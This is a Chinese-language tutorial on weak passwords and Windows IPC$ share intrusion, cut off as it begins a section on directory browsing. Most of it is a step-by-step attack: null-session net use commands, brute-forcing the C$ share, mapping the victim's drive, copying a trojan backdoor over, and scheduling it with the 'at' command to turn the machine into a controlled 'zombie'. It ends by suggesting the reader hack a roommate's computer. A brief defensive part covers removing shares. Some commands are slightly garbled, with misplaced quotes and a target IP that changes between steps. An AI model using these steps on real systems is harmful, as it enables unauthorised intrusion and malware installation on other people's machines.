一、什么是弱口令
就是说由常用数字、字母、字符等组合成的,容易被别人通过简单及平常的思维方式就能猜到的密码,利用弱口令结合计算机系统等漏洞可以做到入侵的事半功倍的效果
二、共享入侵--IPC$
IPC$是共享“命名管道”资源,它是为了让进程间通信而开放的命令管道,可以通过验证用户名和密码获取相应的权限,在远程管理计算机和查看计算机的共享资源是使用,利用IPC$,攻击者甚至可以与目标主机建立一个空的连接而无需用户名和密码,前提是对方开启了IPC$共享。
1、如何利用iPC$入侵
第一步,利用空连接得到目标主机上的用户列表,使用命令,例如:net use \\192.168.1.200\ipc$"/user:"" 建立连接,
第二步,采用爆破方法扫描得到用户名和密码 ,其实就是net use z:\\192.168.1.200\c$,不断的暴力尝试
第三步,得到用户名和密码后 登录对方电脑,net use \\192.168.1.200\ipc$ "test" /user:administrator,net use z:\\192.168.1.203\ipc$
第四步,打开我的电脑发现多了一个z盘,其实就是目标机的c盘内容了
第五步,上传木马后门,exe文件或者bat文件都可以,就是复制粘贴就行了
第六步,执行木马后门,利用at命令设定时间运行该程序,先net time \\192.168.1.203命令查看系统时间,而后领用at命令at \\192.168.1.203 21:05 c:\test.bat,就可以让目标机在预定时间只用木马,而后沦为肉鸡。
2、IPC$入侵注意事项
第一,不要把\写成了/
第二,在建立空连接的时候,引号的输入应在英文状态下输入
3、如何防范IPC$入侵
第一,cmd下输入命令:net share 看看自己的机器开了多少共享
第二,再用net share 共享名/del删除共享
第三,最彻底的办法就是禁用IPC$服务,命令为:net stop server,而后输入y即可
以上就是IPC$入侵的大致过程,不妨自己虚拟机环境下自己动手运行一下,或者黑一下室友的机子。。。。。。。。。。。
三、目录浏览
目录浏览是基于web服务的,也就是说如果web服务